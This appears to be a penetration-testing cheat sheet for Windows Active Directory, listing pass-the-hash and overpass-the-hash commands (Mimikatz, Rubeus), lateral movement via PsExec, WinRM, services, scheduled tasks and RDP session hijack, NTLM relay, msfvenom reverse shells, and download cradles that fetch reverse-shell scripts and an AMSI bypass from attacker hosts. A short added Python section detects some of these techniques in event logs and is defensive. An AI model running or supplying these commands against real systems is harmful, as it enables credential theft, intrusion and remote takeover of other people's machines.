Run in the context of another user
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
runas /netonly /user:<DOMAIN>\<USER> powershell.exe
.\rubeus.exe asktgt /user:<USER> /domain:<DOMAIN> /dc:<DC IP> /rc4:<HASH>
mimikatz.exe sekurlsa::pth /domain:<DOMAIN> /user:<USER> /rc4:<HASH>
.\psexec_windows.exe -hashes <LM HASH>:<NTLM HASH> <DOMAIN>/<USER>@<COMPUTERNAME>
Requires elevated privileges to execute commands
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme winrm <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme mssql <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme rdp <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
Invoke-SMBExec -Target <COMPUTERNAME> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM HASH> -Command <COMMAND> -Verbose
.\PsExec64.exe \\<COMPUTERNAME> -accepteula -u <DOMAIN>\<ADMINISTRATOR> -p <PASSWORD> -i cmd.exe
.\PsExec64.exe \\<COMPUTERNAME> -accepteula -u <COMPUTERNAME>\administrator -p <PASSWORD> -i cmd.exe
.\PsExec64.exe \\<COMPUTERNAME> -accepteula
.\psexec_windows.exe <DOMAIN>/<USER>@<TARGET FQDN> -hashes :<NTLM HASH>
Overpass the hash (OPTH) generates Kerberos tokens (tickets) from hashes or keys. Needs elevation (Run as administrator)
OPSEC TIP: Use aes256 keys!
.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>
Mimikatz overpass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:powershell.exe"'
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:cmd.exe" "exit"
The commands below don't need elevation
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM HASH> /domain:<DOMAIN> /nowrap /ptt
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain:<DOMAIN> /opsec /nowrap /ptt
The command below needs elevation
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain:<DOMAIN> /opsec /nowrap /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Enter-PSSession -ComputerName <NAME>
$sess = New-PSSession <SERVER> -Credential <DOMAIN>\<USER>
Invoke-Command -Scriptblock {hostname; whoami;} -Session $sess
Overpass the hash with Mimikatz to get a reverse shell
powercat -l -v -p 444 -t 5000
$sess = New-PSSession <SERVER>
# The .ps1 is a reverse shell back to the attacker machine; make sure you run it as the user you want
$Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''))'; Out-File -Encoding Ascii -InputObject $Contents -FilePath reverse.bat
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:C:\reverse.bat"'
.\psexec_windows.exe <DOMAIN>/<USER>@<TARGET FQDN> -hashes :<NTLM HASH>
powershell.exe
$password = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $password)
$sess = new-pssession -credential $creds -computername <TARGET FQDN>
enter-pssession $sess
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme winrm <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme mssql <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme rdp <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
Find-LocalAdminAccess -Verbose
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
Lateral Movement Techniques
Uses WinRM / WMI. The commands work with the -Credential $creds parameter.
$creds = get-credential
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('<USERNAME>', $password)
Enter-PSSession -Computername <COMPUTERNAME>
Connect to machine and save in session variable
$sess = New-PSSession -Computername <COMPUTERNAME>
Enter-PSSession $sess
Execute commands on a machine
Invoke-Command -Computername <COMPUTERNAME> -Scriptblock {<COMMAND>}
Invoke-Command -Scriptblock {<COMMAND>} $sess
Invoke-Command -Computername <COMPUTERNAME> -FilePath <PATH>
Invoke-Command -FilePath <PATH> $sess
Run commands on multiple machines
Invoke-Command -Scriptblock {<COMMAND>} -ComputerName (Get-Content computers.txt)
Execute script on multiple machines
Invoke-Command -FilePath script.ps1 -ComputerName (Get-Content computers.txt)
Execute locally loaded function on remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content computers.txt)
Copy-Item -ToSession $sess -Path <PATH> -Destination <DEST> -verbose
Copy-Item -FromSession $sess -Path <PATH> -Destination <DEST> -verbose
PSRemoting NTLM authentication (after overpass the hash)
Enter-PSSession -ComputerName <COMPUTERNAME> -Authentication NegotiateWithImplicitCredential
Get-Item WSMan:\localhost\Client\TrustedHosts
Set-Item WSMan:\localhost\Client\TrustedHosts -Value '<MACHINE OR IP>' -Concatenate
Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*'
psexec.exe -u <DOMAIN>\<USER> -p <PASSWORD> \\<TARGET> cmd.exe
python psexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
smbexec.py can be used to automate the process
sc.exe \\<TARGET> create SERVICE_NAME displayname= NAME binpath= "COMMAND" start= demand
sc.exe \\<TARGET> start SERVICE_NAME
sc.exe \\<TARGET> delete SERVICE_NAME
schtasks /create /F /tn <TASKNAME> /tr COMMAND /sc once /st 23:00 /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /run /F /tn <TASKNAME> /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /delete /F /tn <TASKNAME> /s <TARGET>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
Pass the hash over RDP with xfreerdp
xfreerdp /u:<USER> /d:<DOMAIN> /pth:<NTLM HASH> /v:<TARGET>
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:mstsc.exe /restrictedadmin"'
If Restricted Admin mode is disabled on the target, enable it by setting DisableRestrictedAdmin to 0:
Enter-PSSession -Computername <TARGET>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
query user
sc.exe create rdphijack binpath= "cmd.exe /c tscon <ID> /dest:<SESSION NAME>"
net start rdphijack
sc.exe delete rdphijack
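A defender-side counterpart to the sc.exe, PsExec, schtasks and tscon commands above, added here and not part of the original cheat sheet: a Python triage of the service-install and task-creation events these techniques leave on the target. The event records are constructed, and only the fields the rules read are included.

```python
"""Added example (not from the page): triage of the System 7045 (service
installed) and Security 4698 (scheduled task created) events that the sc.exe,
PsExec, schtasks and tscon commands above leave on the target. Sample events
are constructed; field names follow the Windows event schema."""
import re

# Constructed sample events, trimmed to the fields the rules inspect.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "rdphijack",
     "ImagePath": "cmd.exe /c tscon 3 /dest:console", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 4698, "TaskName": r"\backup", "SubjectUserName": "alice",
     "TaskContent": "<Command>powershell.exe</Command><Arguments>-enc AAAA</Arguments>"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "SubjectUserName": "SYSTEM",
     "TaskContent": r"<Command>%windir%\system32\defrag.exe</Command>"},
]

# A service whose image is an interpreter command line (the "sc create ...
# binpath= cmd.exe /c ..." pattern, including the tscon session hijack).
SERVICE_CMD = re.compile(r"(^|\\)(cmd|powershell|pwsh)\.exe\b|\btscon\b", re.I)
# PsExec installs its own service binary under this name.
PSEXEC_SVC = re.compile(r"\bPSEXESVC\b", re.I)
# A task whose action is an interpreter rather than a specific binary.
TASK_CMD = re.compile(r"<Command>[^<]*\b(cmd|powershell|pwsh)\.exe", re.I)

def classify_service(ev):
    """Label a 7045 event, or return None when the image looks ordinary."""
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    if PSEXEC_SVC.search(name) or PSEXEC_SVC.search(path):
        return "psexec_service"
    if SERVICE_CMD.search(path):
        return "commandline_service"
    return None

def classify_task(ev):
    """Label a 4698 event, or return None when the action is a plain binary."""
    return "interpreter_task" if TASK_CMD.search(ev.get("TaskContent", "")) else None

def triage(events):
    """Return (label, service or task name) for each suspicious event."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 7045 and classify_service(ev):
            hits.append((classify_service(ev), ev["ServiceName"]))
        elif ev.get("EventID") == 4698 and classify_task(ev):
            hits.append((classify_task(ev), ev["TaskName"]))
    return hits
```

Service names such as rdphijack are chosen by the operator, so the rules key on the image path and task action rather than on the name.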
Accessing RDP credentials
Complicated; have to access ECPPTX again and try it out.
SCShell.exe <TARGET> XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://<PAYLOAD WEBSITE>/payload.sct scrobj.dll" . <USER> <PASSWORD>
SCShell.py
Invoke-Pbing -Target <TARGET> -Domain <DOMAIN> -User <USER> -Password <PASSWORD>
PSWA runs on port 443 at /pswa
Install PowerShell Web Access on the target
Install-WindowsFeature -Name WindowsPowerShellWebAccess
Install-PswaWebApplication -UseTestCertificate
Add-PswaAuthorizationRule -Username <USERNAME> -Computername <COMPUTER> -ConfigurationName <CONFIG NAME>
# Allow everyone (Still requires localadmin on target server)
Add-PswaAuthorizationRule -Username * -Computername * -ConfigurationName *
Go to https://<IP>/pswa and then log in using <DOMAIN>/<USER>
CrackMapExec: list hosts with SMB signing disabled
crackmapexec smb <CIDR> --gen-relay-list <OUTPUT FILE>
Edit the Responder config file to disable the HTTP and SMB servers
ntlmrelayx.py -t <TARGET> -c 'powershell.exe iex (New-Object Net.WebClient).DownloadString("http://<ATTACKER IP>/Invoke-PowerShellTcp.ps1")' -smb2support
responder -I <INTERFACE> -v
# Meterpreter ps1 rev shell
msfvenom -p windows/x64/meterpreter_reverse_https -f psh -o msf.ps1 lhost=<HOST> lport=<PORT> exitfunc=thread
# Meterpreter bind tcp executable
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<HOST> LPORT=<PORT> -f exe -o bind_tcp.exe
# Meterpreter reverse tcp executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HOST> LPORT=<PORT> -f exe > shell.exe
# Bat file to run reverse powershell
msfvenom -p cmd/windows/reverse_powershell LHOST=<HOST> LPORT=<PORT> > attach.bat
powershell.exe -c "iex (New-Object Net.WebClient).DownloadString('http://<IP>/amsi.txt'); iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp2.ps1')"